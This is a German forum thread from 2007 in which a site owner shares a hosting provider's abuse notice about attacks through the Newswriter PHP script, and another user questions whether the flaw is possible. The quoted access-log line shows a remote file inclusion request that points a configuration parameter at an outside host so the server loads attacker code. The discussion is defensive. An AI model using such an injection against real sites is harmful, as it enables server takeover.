Antwort schreiben 
 
Themabewertung:
  • 0 Bewertungen - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Hacker Bug 1.2
12.10.2007, 12:40 PM
Beitrag: #61
Re: Hacker Bug 1.2
Moin Moin
Gestern hab ich mal wieder eine mail bekommen von Puretec.

Zitat:wiederum mussten wir einen über Ihre Präenz ausgeführten Angriff auf unseren Webserver registrieren. Erneut war die Software "Newswriter"
Ausgangspunkt, welches das Ausführen beliebigen Codes erlaubt.

Wir möchten Sie nun nochmals bitten sich des Problems anzunehmen und für die Sicherheit der von Ihnen verwendeten Software Sorge zu tragen.

200.126.201.125 - - [11/Oct/2007:07:20:37 +0200] "GET /cgi/newssystem/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http
://quecagada.bravehost.com/http? HTTP/1.1" 200 15 www.****-****** "Mozilla/3.0 (compatible; Indy Library)" "-"

allso es reicht nicht nur eine umleitung in den zwei dateien werde die umleitung in allen dateien im incude ordner vornehmen.
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
14.10.2007, 18:47 PM
Beitrag: #62
Re: Hacker Bug 1.2
Hi,

das ist aber ansich nicht möglich, weil in der initvars.inc.php der Platzhalter $NWCONF_SYSTEM[server_path] gar nicht vor kommt. Also kann der gar nicht aufgerufen bzw. überschrieben werden.

cu basti

iwebspace.de | Webspaceorder - Bestellsystem für ISP
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
Antwort schreiben 


Möglicherweise verwandte Themen...
Thema: Verfasser Antworten: Ansichten: Letzter Beitrag
  Hacker Angriffe brummi 2 5,769 04.03.2008 23:25 PM
Letzter Beitrag: basti

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste

Kontakt | faqboard.info | Nach oben | Zum Inhalt | Archiv-Modus | RSS-Synchronisation